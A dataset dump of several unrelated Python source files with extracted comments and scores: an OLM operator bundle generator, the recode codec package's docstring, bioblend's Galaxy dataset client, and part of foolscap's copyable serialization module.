yaml_file = yaml.safe_load_all(stream)
for obj in yaml_file:
prev_csv = obj['channels'][0]['currentCSV']
# create package content
package = {}
package['packageName'] = operator_name
package['channels'] = []
package['channels'].append({'currentCSV': "%s.v%s" % (operator_name, operator_version), 'name': channel_name})
with open(package_file, 'w') as outfile:
yaml.dump(package, outfile, default_flow_style=False)
print("Wrote Package: %s" % package_file)
print("Generating CSV for version: %s" % operator_version)
with open('scripts/templates/csv.yaml', 'r') as stream:
csv = yaml.safe_load(stream)
# set templated values
csv['metadata']['name'] = operator_name
csv['metadata']['namespace'] = operator_namespace
csv['metadata']['containerImage'] = operator_image
csv['spec']['displayName'] = operator_name
csv['spec']['description'] = "SRE operator - " + operator_name
csv['spec']['version'] = operator_version
csv['spec']['install']['spec']['clusterPermissions'] = []
SA_NAME = operator_name
clusterrole_names_csv = []
for subdir, dirs, files in os.walk(operator_assets_dir):
for file in files:
file_path = subdir + os.sep + file
# Parse each file and look for ClusterRoleBindings to the SA
with open(file_path) as stream:
yaml_file = yaml.safe_load_all(stream)
for obj in yaml_file:
if obj['kind'] == 'ClusterRoleBinding':
for subject in obj['subjects']:
if subject['kind'] == 'ServiceAccount' and subject['name'] == SA_NAME:
clusterrole_names_csv.append(obj['roleRef']['name'])
csv['spec']['install']['spec']['deployments'] = []
csv['spec']['install']['spec']['deployments'].append({'spec':{}})
for subdir, dirs, files in os.walk(operator_assets_dir):
for file in files:
file_path = subdir + os.sep + file
# Parse files to manage clusterPermissions and deployments in csv
with open(file_path) as stream:
yaml_file = yaml.safe_load_all(stream)
for obj in yaml_file:
if obj['kind'] == 'ClusterRole' and any(obj['metadata']['name'] in cr for cr in clusterrole_names_csv):
print('Adding ClusterRole to CSV: {}'.format(file_path))
csv['spec']['install']['spec']['clusterPermissions'].append(
{
'rules': obj['rules'],
'serviceAccountName': SA_NAME,
})
if obj['kind'] == 'Deployment' and obj['metadata']['name'] == operator_name:
print('Adding Deployment to CSV: {}'.format(file_path))
csv['spec']['install']['spec']['deployments'][0]['spec'] = obj['spec']
csv['spec']['install']['spec']['deployments'][0]['name'] = operator_name
if obj['kind'] == 'ClusterRole' or obj['kind'] == 'Role' or obj['kind'] == 'RoleBinding' or obj['kind'] == 'ClusterRoleBinding':
if obj['kind'] in ('RoleBinding', 'ClusterRoleBinding'):
try:
print(obj['roleRef']['kind'])
except KeyError:
# require a well formed roleRef, olm doesn't check this until deployed and InstallPlan fails
print >> sys.stderr, "ERROR {} '{}' is missing .roleRef.kind in file {}".format(obj['kind'], obj['metadata']['name'], file_path)
sys.exit(1)
print('Adding {} to Catalog: {}'.format(obj['kind'], file_path))
if 'namespace' in obj['metadata']:
bundle_filename="10-{}.{}.{}.yaml".format(obj['metadata']['namespace'], obj['metadata']['name'], obj['kind']).lower()
else:
bundle_filename="00-{}.{}.yaml".format(obj['metadata']['name'], obj['kind']).lower()
shutil.copyfile(file_path, os.path.join(version_dir, bundle_filename))
if len(csv['spec']['install']['spec']['deployments']) == 0:
print >> sys.stderr, "ERROR Did not find any Deployments in {}. There is nothing to deploy, so giving up.".format(operator_assets_dir)
sys.exit(1)
# Update the deployment to use the defined image:
csv['spec']['install']['spec']['deployments'][0]['spec']['template']['spec']['containers'][0]['image'] = operator_image
# Update the versions to include git hash:
csv['metadata']['name'] = "%s.v%s" % (operator_name, operator_version)
csv['spec']['version'] = operator_version
if prev_csv != "__undefined__":
csv['spec']['replaces'] = prev_csv
# adjust the install mode for multiple namespaces, if we need to
i = 0
found_multi_namespace = False
for m in csv['spec']['installModes']:
print("Looking for MultiNamespace, i = {} on = {}".format(i, m['type']))
if m['type'] == "MultiNamespace":
found_multi_namespace = True
break
i = i + 1
if found_multi_namespace:
csv['spec']['installModes'][i]['supported'] = multi_namespace
# Set the CSV createdAt annotation:
now = datetime.datetime.now()
csv['metadata']['annotations']['createdAt'] = now.strftime("%Y-%m-%dT%H:%M:%SZ")
# Write the CSV to disk:
csv_filename = "20-%s.v%s.clusterserviceversion.yaml" % (operator_name, operator_version)
csv_file = os.path.join(version_dir, csv_filename)
with open(csv_file, 'w') as outfile:
yaml.dump(csv, outfile, default_flow_style=False)
print("Wrote ClusterServiceVersion: %s" % csv_file)
|
en
| 0.831335
|
#!/usr/bin/env python # # Generate an operator bundle for publishing to OLM. Copies appropriate files # into a directory, and composes the ClusterServiceVersion which needs bits and # pieces of our rbac and deployment files. # # Coerce to a boolean # Check to see if the manifests directory exists before going on. # fail if there is a bundle for the target version already # doesn't exist, create the target version # update operator package # create package content # set templated values # Parse each file and look for ClusterRoleBindings to the SA # Parse files to manage clusterPermissions and deployments in csv # require a well formed roleRef, olm doesn't check this until deployed and InstallPlan fails # Update the deployment to use the defined image: # Update the versions to include git hash: # adjust the install mode for multiple namespaces, if we need to # Set the CSV createdAt annotation: # Write the CSV to disk:
| 2.201246
| 2
|
recode/__init__.py
|
otosense/recode
| 0
|
6627622
|
r"""
Make codecs for fixed size structured chunks serialization and deserialization of
sequences, tabular data, and time-series.
The easiest and bigest bang for your buck is ``mk_codec``
>>> from recode import mk_codec
>>> encoder, decoder = mk_codec()
``encoder`` will encode a list (or any iterable) of numbers into bytes
>>> b = encoder([0, -3, 3.14])
>>> b
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xc0\x1f\x85\xebQ\xb8\x1e\t@'
``decoder`` will decode those bytes to get you back your numbers
>>> decoder(b)
[0.0, -3.0, 3.14]
There's only really one argument you need to know about in ``mk_codec``.
The first argument, called `chk_format`, which is a string of characters from
the "Format" column of
https://docs.python.org/3/library/struct.html#format-characters
The length of the string specifies the number of "channels",
and each individual character of the string specifies the kind of encoding you should
apply to each "channel" (hold your horses, we'll explain).
The one we've just been through is in fact
>>> encoder, decoder = mk_codec('d')
That is, it will expect that your data is a list of numbers, and they'll be encoded
with the 'd' format character, that is 8-bytes doubles.
That default is goo because it gives you a lot of room, but if you knew that you
would only be dealing with 2-byte integers (as in most WAV audio waveforms),
you would have chosen `h`:
>>> encoder, decoder = mk_codec('h')
What about those channels?
Well, some times you need to encode/decode multi-channel streams, such as:
>>> multi_channel_stream = [[3, -1], [4, -1], [5, -9]]
Say, for example, if you were dealing with stereo waveform
(with the standard PCM_16 format), you'd do it this way:
>>> encoder, decoder = mk_codec('hh')
>>> pcm_bytes = encoder(iter(multi_channel_stream))
>>> pcm_bytes
b'\x03\x00\xff\xff\x04\x00\xff\xff\x05\x00\xf7\xff'
>>> decoder(pcm_bytes)
[(3, -1), (4, -1), (5, -9)]
The `n_channels` and `chk_size_bytes` arguments are there if you want to assert
that your number of channels and chunk size are what you expect.
Again, these are just for verification, because we know how easy it is to
misspecify the `chk_format`, and how hard it can be to notice that we did.
It is advised to use these in any production code, for the sanity of everyone!
>>> mk_codec('hhh', n_channels=2)
Traceback (most recent call last):
...
AssertionError: You said there'd be 2 channels, but I inferred 3
>>> mk_codec('hhh', chk_size_bytes=3)
Traceback (most recent call last):
...
AssertionError: The given chk_size_bytes 3 did not match the inferred (from chk_format) 6
Finally, so far we've done it this way:
>>> encoder, decoder = mk_codec('hHifd')
But see that what's actually returned is a NAMED tuple, which means that you can
can also get one object that will have `.encode` and `.decode` properties:
>>> codec = mk_codec('hHifd')
>>> to_encode = [[1, 2, 3, 4, 5], [6, 7, 8, 9, 10]]
>>> encoded = codec.encode(to_encode)
>>> decoded = codec.decode(encoded)
>>> decoded
[(1, 2, 3, 4.0, 5.0), (6, 7, 8, 9.0, 10.0)]
And you can checkout the properties of your encoder and decoder (they
should be the same)
>>> codec.encode.chk_format
'hHifd'
>>> codec.encode.n_channels
5
>>> codec.encode.chk_size_bytes
24
"""
from recode.base import mk_codec # main interface function
mk_codec = mk_codec
from recode.util import spy, get_struct, list_of_dicts
from recode.base import *
from recode.audio import (
# encode_wav,
# decode_wav,
encode_wav_header_bytes,
decode_wav_header_bytes,
mk_pcm_audio_codec,
encode_wav_header_bytes,
decode_wav_header_bytes,
)
|
r"""
Make codecs for fixed size structured chunks serialization and deserialization of
sequences, tabular data, and time-series.
The easiest and bigest bang for your buck is ``mk_codec``
>>> from recode import mk_codec
>>> encoder, decoder = mk_codec()
``encoder`` will encode a list (or any iterable) of numbers into bytes
>>> b = encoder([0, -3, 3.14])
>>> b
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xc0\x1f\x85\xebQ\xb8\x1e\t@'
``decoder`` will decode those bytes to get you back your numbers
>>> decoder(b)
[0.0, -3.0, 3.14]
There's only really one argument you need to know about in ``mk_codec``.
The first argument, called `chk_format`, which is a string of characters from
the "Format" column of
https://docs.python.org/3/library/struct.html#format-characters
The length of the string specifies the number of "channels",
and each individual character of the string specifies the kind of encoding you should
apply to each "channel" (hold your horses, we'll explain).
The one we've just been through is in fact
>>> encoder, decoder = mk_codec('d')
That is, it will expect that your data is a list of numbers, and they'll be encoded
with the 'd' format character, that is 8-bytes doubles.
That default is goo because it gives you a lot of room, but if you knew that you
would only be dealing with 2-byte integers (as in most WAV audio waveforms),
you would have chosen `h`:
>>> encoder, decoder = mk_codec('h')
What about those channels?
Well, some times you need to encode/decode multi-channel streams, such as:
>>> multi_channel_stream = [[3, -1], [4, -1], [5, -9]]
Say, for example, if you were dealing with stereo waveform
(with the standard PCM_16 format), you'd do it this way:
>>> encoder, decoder = mk_codec('hh')
>>> pcm_bytes = encoder(iter(multi_channel_stream))
>>> pcm_bytes
b'\x03\x00\xff\xff\x04\x00\xff\xff\x05\x00\xf7\xff'
>>> decoder(pcm_bytes)
[(3, -1), (4, -1), (5, -9)]
The `n_channels` and `chk_size_bytes` arguments are there if you want to assert
that your number of channels and chunk size are what you expect.
Again, these are just for verification, because we know how easy it is to
misspecify the `chk_format`, and how hard it can be to notice that we did.
It is advised to use these in any production code, for the sanity of everyone!
>>> mk_codec('hhh', n_channels=2)
Traceback (most recent call last):
...
AssertionError: You said there'd be 2 channels, but I inferred 3
>>> mk_codec('hhh', chk_size_bytes=3)
Traceback (most recent call last):
...
AssertionError: The given chk_size_bytes 3 did not match the inferred (from chk_format) 6
Finally, so far we've done it this way:
>>> encoder, decoder = mk_codec('hHifd')
But see that what's actually returned is a NAMED tuple, which means that you can
can also get one object that will have `.encode` and `.decode` properties:
>>> codec = mk_codec('hHifd')
>>> to_encode = [[1, 2, 3, 4, 5], [6, 7, 8, 9, 10]]
>>> encoded = codec.encode(to_encode)
>>> decoded = codec.decode(encoded)
>>> decoded
[(1, 2, 3, 4.0, 5.0), (6, 7, 8, 9.0, 10.0)]
And you can checkout the properties of your encoder and decoder (they
should be the same)
>>> codec.encode.chk_format
'hHifd'
>>> codec.encode.n_channels
5
>>> codec.encode.chk_size_bytes
24
"""
from recode.base import mk_codec # main interface function
mk_codec = mk_codec
from recode.util import spy, get_struct, list_of_dicts
from recode.base import *
from recode.audio import (
# encode_wav,
# decode_wav,
encode_wav_header_bytes,
decode_wav_header_bytes,
mk_pcm_audio_codec,
encode_wav_header_bytes,
decode_wav_header_bytes,
)
|
en
| 0.825712
|
Make codecs for fixed size structured chunks serialization and deserialization of sequences, tabular data, and time-series. The easiest and bigest bang for your buck is ``mk_codec`` >>> from recode import mk_codec >>> encoder, decoder = mk_codec() ``encoder`` will encode a list (or any iterable) of numbers into bytes >>> b = encoder([0, -3, 3.14]) >>> b b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xc0\x1f\x85\xebQ\xb8\x1e\t@' ``decoder`` will decode those bytes to get you back your numbers >>> decoder(b) [0.0, -3.0, 3.14] There's only really one argument you need to know about in ``mk_codec``. The first argument, called `chk_format`, which is a string of characters from the "Format" column of https://docs.python.org/3/library/struct.html#format-characters The length of the string specifies the number of "channels", and each individual character of the string specifies the kind of encoding you should apply to each "channel" (hold your horses, we'll explain). The one we've just been through is in fact >>> encoder, decoder = mk_codec('d') That is, it will expect that your data is a list of numbers, and they'll be encoded with the 'd' format character, that is 8-bytes doubles. That default is goo because it gives you a lot of room, but if you knew that you would only be dealing with 2-byte integers (as in most WAV audio waveforms), you would have chosen `h`: >>> encoder, decoder = mk_codec('h') What about those channels? Well, some times you need to encode/decode multi-channel streams, such as: >>> multi_channel_stream = [[3, -1], [4, -1], [5, -9]] Say, for example, if you were dealing with stereo waveform (with the standard PCM_16 format), you'd do it this way: >>> encoder, decoder = mk_codec('hh') >>> pcm_bytes = encoder(iter(multi_channel_stream)) >>> pcm_bytes b'\x03\x00\xff\xff\x04\x00\xff\xff\x05\x00\xf7\xff' >>> decoder(pcm_bytes) [(3, -1), (4, -1), (5, -9)] The `n_channels` and `chk_size_bytes` arguments are there if you want to assert that your number of channels and chunk size are what you expect. Again, these are just for verification, because we know how easy it is to misspecify the `chk_format`, and how hard it can be to notice that we did. It is advised to use these in any production code, for the sanity of everyone! >>> mk_codec('hhh', n_channels=2) Traceback (most recent call last): ... AssertionError: You said there'd be 2 channels, but I inferred 3 >>> mk_codec('hhh', chk_size_bytes=3) Traceback (most recent call last): ... AssertionError: The given chk_size_bytes 3 did not match the inferred (from chk_format) 6 Finally, so far we've done it this way: >>> encoder, decoder = mk_codec('hHifd') But see that what's actually returned is a NAMED tuple, which means that you can can also get one object that will have `.encode` and `.decode` properties: >>> codec = mk_codec('hHifd') >>> to_encode = [[1, 2, 3, 4, 5], [6, 7, 8, 9, 10]] >>> encoded = codec.encode(to_encode) >>> decoded = codec.decode(encoded) >>> decoded [(1, 2, 3, 4.0, 5.0), (6, 7, 8, 9.0, 10.0)] And you can checkout the properties of your encoder and decoder (they should be the same) >>> codec.encode.chk_format 'hHifd' >>> codec.encode.n_channels 5 >>> codec.encode.chk_size_bytes 24 # main interface function # encode_wav, # decode_wav,
| 3.188974
| 3
|
bioblend/galaxy/datasets/__init__.py
|
davidchristiany/bioblend
| 0
|
6627623
|
<reponame>davidchristiany/bioblend
"""
Contains possible interactions with the Galaxy Datasets
"""
import logging
import os
import shlex
import time
from six.moves.urllib.parse import urljoin
from six.moves.urllib.request import urlopen
import bioblend
from bioblend.galaxy.client import Client
log = logging.getLogger(__name__)
terminal_states = ('ok', 'empty', 'error', 'discarded', 'failed_metadata')
class DatasetClient(Client):
def __init__(self, galaxy_instance):
self.module = 'datasets'
super(DatasetClient, self).__init__(galaxy_instance)
def show_dataset(self, dataset_id, deleted=False, hda_ldda='hda'):
"""
Get details about a given dataset. This can be a history or a library dataset.
:type dataset_id: str
:param dataset_id: Encoded dataset ID
:type deleted: bool
:param deleted: Whether to return results for a deleted dataset
:type hda_ldda: str
:param hda_ldda: Whether to show a history dataset ('hda' - the default) or library
dataset ('ldda').
:rtype: dict
:return: Information about the HDA or LDDA
"""
params = dict(
hda_ldda=hda_ldda,
)
return self._get(id=dataset_id, deleted=deleted, params=params)
def download_dataset(self, dataset_id, file_path=None, use_default_filename=True,
maxwait=12000):
"""
Download a dataset to file or in memory. If the dataset state is not
'ok', a ``DatasetStateException`` will be thrown.
:type dataset_id: str
:param dataset_id: Encoded dataset ID
:type file_path: str
:param file_path: If this argument is provided, the dataset will be streamed to disk
at that path (should be a directory if ``use_default_filename=True``).
If the file_path argument is not provided, the dataset content is loaded into memory
and returned by the method (Memory consumption may be heavy as the entire file
will be in memory).
:type use_default_filename: bool
:param use_default_filename: If ``True``, the exported
file will be saved as ``file_path/%s``,
where ``%s`` is the dataset name.
If ``False``, ``file_path`` is assumed to
contain the full file path including the filename.
:type maxwait: float
:param maxwait: Total time (in seconds) to wait for the dataset state to
become terminal. If the dataset state is not terminal within this
time, a ``DatasetTimeoutException`` will be thrown.
:rtype: dict
:return: If a ``file_path`` argument is not provided, returns a dict containing the file content.
Otherwise returns nothing.
"""
dataset = self._block_until_dataset_terminal(dataset_id, maxwait=maxwait)
if not dataset['state'] == 'ok':
raise DatasetStateException("Dataset state is not 'ok'. Dataset id: %s, current state: %s" % (dataset_id, dataset['state']))
# Galaxy release_13.01 and earlier does not have file_ext in the dataset
# dict, so resort to data_type.
# N.B.: data_type cannot be used for Galaxy release_14.10 and later
# because it was changed to the Galaxy datatype class
file_ext = dataset.get('file_ext', dataset['data_type'])
# Resort to 'data' when Galaxy returns an empty or temporary extension
if not file_ext or file_ext == 'auto' or file_ext == '_sniff_':
file_ext = 'data'
# The preferred download URL is
# '/api/histories/<history_id>/contents/<dataset_id>/display?to_ext=<dataset_ext>'
# since the old URL:
# '/dataset/<dataset_id>/display/to_ext=<dataset_ext>'
# does not work when using REMOTE_USER with access disabled to
# everything but /api without auth
if 'url' in dataset:
# This is Galaxy release_15.03 or later
download_url = dataset['download_url'] + '?to_ext=' + file_ext
else:
# This is Galaxy release_15.01 or earlier, for which the preferred
# URL does not work without a key, so resort to the old URL
download_url = 'datasets/' + dataset_id + '/display?to_ext=' + file_ext
url = urljoin(self.gi.base_url, download_url)
stream_content = file_path is not None
r = self.gi.make_get_request(url, stream=stream_content)
r.raise_for_status()
if file_path is None:
if 'content-length' in r.headers and len(r.content) != int(r.headers['content-length']):
log.warning("Transferred content size does not match content-length header (%s != %s)" % (len(r.content), r.headers['content-length']))
return r.content
else:
if use_default_filename:
# Build a useable filename
filename = dataset['name'] + '.' + file_ext
# Now try to get a better filename from the response headers
# We expect tokens 'filename' '=' to be followed by the quoted filename
if 'content-disposition' in r.headers:
tokens = list(shlex.shlex(r.headers['content-disposition'], posix=True))
try:
header_filepath = tokens[tokens.index('filename') + 2]
filename = os.path.basename(header_filepath)
except (ValueError, IndexError):
pass
file_local_path = os.path.join(file_path, filename)
else:
file_local_path = file_path
with open(file_local_path, 'wb') as fp:
for chunk in r.iter_content(chunk_size=bioblend.CHUNK_SIZE):
if chunk:
fp.write(chunk)
# Return location file was saved to
return file_local_path
def _block_until_dataset_terminal(self, dataset_id, maxwait=12000, interval=3):
"""
Wait until the dataset state is terminal ('ok', 'empty', 'error',
'discarded' or 'failed_metadata').
"""
assert maxwait >= 0
assert interval > 0
time_left = maxwait
while True:
dataset = self.show_dataset(dataset_id)
state = dataset['state']
if state in terminal_states:
return dataset
time_left -= interval
if time_left > 0:
log.warning("Waiting for dataset %s to complete. Will wait %i more s" % (dataset_id, time_left))
time.sleep(min(time_left, interval))
else:
raise DatasetTimeoutException("Waited too long for dataset %s to complete" % dataset_id)
def show_stderr(self, dataset_id):
"""
Get the stderr output of a dataset.
.. deprecated:: 0.9.0
Use :meth:`~bioblend.galaxy.jobs.JobsClient.show_job` with
``full_details=True`` instead.
:type dataset_id: str
:param dataset_id: Encoded dataset ID
"""
res = urlopen(self.url[:-len("/api/datasets/") + 1] + "/datasets/" + dataset_id + "/stderr")
return res.read()
def show_stdout(self, dataset_id):
"""
Get the stdout output of a dataset.
.. deprecated:: 0.9.0
Use :meth:`~bioblend.galaxy.jobs.JobsClient.show_job` with
``full_details=True`` instead.
:type dataset_id: str
:param dataset_id: Encoded dataset ID
"""
res = urlopen(self.url[:-len("/api/datasets/") + 1] + "/datasets/" + dataset_id + "/stdout")
return res.read()
class DatasetStateException(Exception):
pass
class DatasetTimeoutException(Exception):
pass
|
"""
Contains possible interactions with the Galaxy Datasets
"""
import logging
import os
import shlex
import time
from six.moves.urllib.parse import urljoin
from six.moves.urllib.request import urlopen
import bioblend
from bioblend.galaxy.client import Client
log = logging.getLogger(__name__)
terminal_states = ('ok', 'empty', 'error', 'discarded', 'failed_metadata')
class DatasetClient(Client):
def __init__(self, galaxy_instance):
self.module = 'datasets'
super(DatasetClient, self).__init__(galaxy_instance)
def show_dataset(self, dataset_id, deleted=False, hda_ldda='hda'):
"""
Get details about a given dataset. This can be a history or a library dataset.
:type dataset_id: str
:param dataset_id: Encoded dataset ID
:type deleted: bool
:param deleted: Whether to return results for a deleted dataset
:type hda_ldda: str
:param hda_ldda: Whether to show a history dataset ('hda' - the default) or library
dataset ('ldda').
:rtype: dict
:return: Information about the HDA or LDDA
"""
params = dict(
hda_ldda=hda_ldda,
)
return self._get(id=dataset_id, deleted=deleted, params=params)
def download_dataset(self, dataset_id, file_path=None, use_default_filename=True,
maxwait=12000):
"""
Download a dataset to file or in memory. If the dataset state is not
'ok', a ``DatasetStateException`` will be thrown.
:type dataset_id: str
:param dataset_id: Encoded dataset ID
:type file_path: str
:param file_path: If this argument is provided, the dataset will be streamed to disk
at that path (should be a directory if ``use_default_filename=True``).
If the file_path argument is not provided, the dataset content is loaded into memory
and returned by the method (Memory consumption may be heavy as the entire file
will be in memory).
:type use_default_filename: bool
:param use_default_filename: If ``True``, the exported
file will be saved as ``file_path/%s``,
where ``%s`` is the dataset name.
If ``False``, ``file_path`` is assumed to
contain the full file path including the filename.
:type maxwait: float
:param maxwait: Total time (in seconds) to wait for the dataset state to
become terminal. If the dataset state is not terminal within this
time, a ``DatasetTimeoutException`` will be thrown.
:rtype: dict
:return: If a ``file_path`` argument is not provided, returns a dict containing the file content.
Otherwise returns nothing.
"""
dataset = self._block_until_dataset_terminal(dataset_id, maxwait=maxwait)
if not dataset['state'] == 'ok':
raise DatasetStateException("Dataset state is not 'ok'. Dataset id: %s, current state: %s" % (dataset_id, dataset['state']))
# Galaxy release_13.01 and earlier does not have file_ext in the dataset
# dict, so resort to data_type.
# N.B.: data_type cannot be used for Galaxy release_14.10 and later
# because it was changed to the Galaxy datatype class
file_ext = dataset.get('file_ext', dataset['data_type'])
# Resort to 'data' when Galaxy returns an empty or temporary extension
if not file_ext or file_ext == 'auto' or file_ext == '_sniff_':
file_ext = 'data'
# The preferred download URL is
# '/api/histories/<history_id>/contents/<dataset_id>/display?to_ext=<dataset_ext>'
# since the old URL:
# '/dataset/<dataset_id>/display/to_ext=<dataset_ext>'
# does not work when using REMOTE_USER with access disabled to
# everything but /api without auth
if 'url' in dataset:
# This is Galaxy release_15.03 or later
download_url = dataset['download_url'] + '?to_ext=' + file_ext
else:
# This is Galaxy release_15.01 or earlier, for which the preferred
# URL does not work without a key, so resort to the old URL
download_url = 'datasets/' + dataset_id + '/display?to_ext=' + file_ext
url = urljoin(self.gi.base_url, download_url)
stream_content = file_path is not None
r = self.gi.make_get_request(url, stream=stream_content)
r.raise_for_status()
if file_path is None:
if 'content-length' in r.headers and len(r.content) != int(r.headers['content-length']):
log.warning("Transferred content size does not match content-length header (%s != %s)" % (len(r.content), r.headers['content-length']))
return r.content
else:
if use_default_filename:
# Build a useable filename
filename = dataset['name'] + '.' + file_ext
# Now try to get a better filename from the response headers
# We expect tokens 'filename' '=' to be followed by the quoted filename
if 'content-disposition' in r.headers:
tokens = list(shlex.shlex(r.headers['content-disposition'], posix=True))
try:
header_filepath = tokens[tokens.index('filename') + 2]
filename = os.path.basename(header_filepath)
except (ValueError, IndexError):
pass
file_local_path = os.path.join(file_path, filename)
else:
file_local_path = file_path
with open(file_local_path, 'wb') as fp:
for chunk in r.iter_content(chunk_size=bioblend.CHUNK_SIZE):
if chunk:
fp.write(chunk)
# Return location file was saved to
return file_local_path
def _block_until_dataset_terminal(self, dataset_id, maxwait=12000, interval=3):
"""
Wait until the dataset state is terminal ('ok', 'empty', 'error',
'discarded' or 'failed_metadata').
"""
assert maxwait >= 0
assert interval > 0
time_left = maxwait
while True:
dataset = self.show_dataset(dataset_id)
state = dataset['state']
if state in terminal_states:
return dataset
time_left -= interval
if time_left > 0:
log.warning("Waiting for dataset %s to complete. Will wait %i more s" % (dataset_id, time_left))
time.sleep(min(time_left, interval))
else:
raise DatasetTimeoutException("Waited too long for dataset %s to complete" % dataset_id)
def show_stderr(self, dataset_id):
"""
Get the stderr output of a dataset.
.. deprecated:: 0.9.0
Use :meth:`~bioblend.galaxy.jobs.JobsClient.show_job` with
``full_details=True`` instead.
:type dataset_id: str
:param dataset_id: Encoded dataset ID
"""
res = urlopen(self.url[:-len("/api/datasets/") + 1] + "/datasets/" + dataset_id + "/stderr")
return res.read()
def show_stdout(self, dataset_id):
"""
Get the stdout output of a dataset.
.. deprecated:: 0.9.0
Use :meth:`~bioblend.galaxy.jobs.JobsClient.show_job` with
``full_details=True`` instead.
:type dataset_id: str
:param dataset_id: Encoded dataset ID
"""
res = urlopen(self.url[:-len("/api/datasets/") + 1] + "/datasets/" + dataset_id + "/stdout")
return res.read()
class DatasetStateException(Exception):
pass
class DatasetTimeoutException(Exception):
pass
|
en
| 0.699391
|
Contains possible interactions with the Galaxy Datasets Get details about a given dataset. This can be a history or a library dataset. :type dataset_id: str :param dataset_id: Encoded dataset ID :type deleted: bool :param deleted: Whether to return results for a deleted dataset :type hda_ldda: str :param hda_ldda: Whether to show a history dataset ('hda' - the default) or library dataset ('ldda'). :rtype: dict :return: Information about the HDA or LDDA Download a dataset to file or in memory. If the dataset state is not 'ok', a ``DatasetStateException`` will be thrown. :type dataset_id: str :param dataset_id: Encoded dataset ID :type file_path: str :param file_path: If this argument is provided, the dataset will be streamed to disk at that path (should be a directory if ``use_default_filename=True``). If the file_path argument is not provided, the dataset content is loaded into memory and returned by the method (Memory consumption may be heavy as the entire file will be in memory). :type use_default_filename: bool :param use_default_filename: If ``True``, the exported file will be saved as ``file_path/%s``, where ``%s`` is the dataset name. If ``False``, ``file_path`` is assumed to contain the full file path including the filename. :type maxwait: float :param maxwait: Total time (in seconds) to wait for the dataset state to become terminal. If the dataset state is not terminal within this time, a ``DatasetTimeoutException`` will be thrown. :rtype: dict :return: If a ``file_path`` argument is not provided, returns a dict containing the file content. Otherwise returns nothing. # Galaxy release_13.01 and earlier does not have file_ext in the dataset # dict, so resort to data_type. # N.B.: data_type cannot be used for Galaxy release_14.10 and later # because it was changed to the Galaxy datatype class # Resort to 'data' when Galaxy returns an empty or temporary extension # The preferred download URL is # '/api/histories/<history_id>/contents/<dataset_id>/display?to_ext=<dataset_ext>' # since the old URL: # '/dataset/<dataset_id>/display/to_ext=<dataset_ext>' # does not work when using REMOTE_USER with access disabled to # everything but /api without auth # This is Galaxy release_15.03 or later # This is Galaxy release_15.01 or earlier, for which the preferred # URL does not work without a key, so resort to the old URL # Build a useable filename # Now try to get a better filename from the response headers # We expect tokens 'filename' '=' to be followed by the quoted filename # Return location file was saved to Wait until the dataset state is terminal ('ok', 'empty', 'error', 'discarded' or 'failed_metadata'). Get the stderr output of a dataset. .. deprecated:: 0.9.0 Use :meth:`~bioblend.galaxy.jobs.JobsClient.show_job` with ``full_details=True`` instead. :type dataset_id: str :param dataset_id: Encoded dataset ID Get the stdout output of a dataset. .. deprecated:: 0.9.0 Use :meth:`~bioblend.galaxy.jobs.JobsClient.show_job` with ``full_details=True`` instead. :type dataset_id: str :param dataset_id: Encoded dataset ID
| 2.646211
| 3
|
src/foolscap/copyable.py
|
jaraco/foolscap
| 29
|
6627624
|
# -*- test-case-name: foolscap.test.test_copyable -*-
# this module is responsible for all copy-by-value objects
import six
from zope.interface import interface, implementer
from twisted.python import reflect, log
from twisted.python.components import registerAdapter
from twisted.internet import defer
from . import slicer, tokens
from .tokens import BananaError, Violation
from foolscap.constraint import OpenerConstraint, IConstraint, Optional
Interface = interface.Interface
############################################################
# the first half of this file is sending/serialization
class ICopyable(Interface):
"""I represent an object which is passed-by-value across PB connections.
"""
def getTypeToCopy():
"""Return a string which names the class. This string must match the
one that gets registered at the receiving end. This is typically a
URL of some sort, in a namespace which you control."""
def getStateToCopy():
"""Return a state dictionary (with plain-string keys) which will be
serialized and sent to the remote end. This state object will be
given to the receiving object's setCopyableState method."""
@implementer(ICopyable)
class Copyable(object):
# you *must* set 'typeToCopy'
def getTypeToCopy(self):
try:
copytype = self.typeToCopy
except AttributeError:
raise RuntimeError("Copyable subclasses must specify 'typeToCopy'")
return copytype
def getStateToCopy(self):
return self.__dict__
class CopyableSlicer(slicer.BaseSlicer):
"""I handle ICopyable objects (things which are copied by value)."""
def slice(self, streamable, banana):
self.streamable = streamable
yield b'copyable'
copytype = self.obj.getTypeToCopy()
assert isinstance(copytype, str)
yield six.ensure_binary(copytype)
state = self.obj.getStateToCopy()
for k,v in state.items():
yield six.ensure_binary(k)
yield v
def describe(self):
return "<%s>" % self.obj.getTypeToCopy()
registerAdapter(CopyableSlicer, ICopyable, tokens.ISlicer)
class Copyable2(slicer.BaseSlicer):
# I am my own Slicer. This has more methods than you'd usually want in a
# base class, but if you can't register an Adapter for a whole class
# hierarchy then you may have to use it.
def getTypeToCopy(self):
return reflect.qual(self.__class__)
def getStateToCopy(self):
return self.__dict__
def slice(self, streamable, banana):
self.streamable = streamable
yield b'instance'
yield six.ensure_binary(self.getTypeToCopy())
yield self.getStateToCopy()
def describe(self):
return "<%s>" % self.getTypeToCopy()
#registerRemoteCopy(typename, factory)
#registerUnslicer(typename, factory)
def registerCopier(klass, copier):
"""This is a shortcut for arranging to serialize third-party clases.
'copier' must be a callable which accepts an instance of the class you
want to serialize, and returns a tuple of (typename, state_dictionary).
If it returns a typename of None, the original class's fully-qualified
classname is used.
"""
klassname = reflect.qual(klass)
@implementer(ICopyable)
class _CopierAdapter:
def __init__(self, original):
self.nameToCopy, self.state = copier(original)
if self.nameToCopy is None:
self.nameToCopy = klassname
def getTypeToCopy(self):
return self.nameToCopy
def getStateToCopy(self):
return self.state
registerAdapter(_CopierAdapter, klass, ICopyable)
############################################################
# beyond here is the receiving/deserialization side
class RemoteCopyUnslicer(slicer.BaseUnslicer):
attrname = None
attrConstraint = None
def __init__(self, factory, stateSchema):
self.factory = factory
self.schema = stateSchema
def start(self, count):
self.d = {}
self.count = count
self.deferred = defer.Deferred()
self.protocol.setObject(count, self.deferred)
def checkToken(self, typebyte, size):
if self.attrname == None:
if typebyte not in (tokens.STRING, tokens.VOCAB):
raise BananaError("RemoteCopyUnslicer keys must be STRINGs")
else:
if self.attrConstraint:
self.attrConstraint.checkToken(typebyte, size)
def doOpen(self, opentype):
if self.attrConstraint:
self.attrConstraint.checkOpentype(opentype)
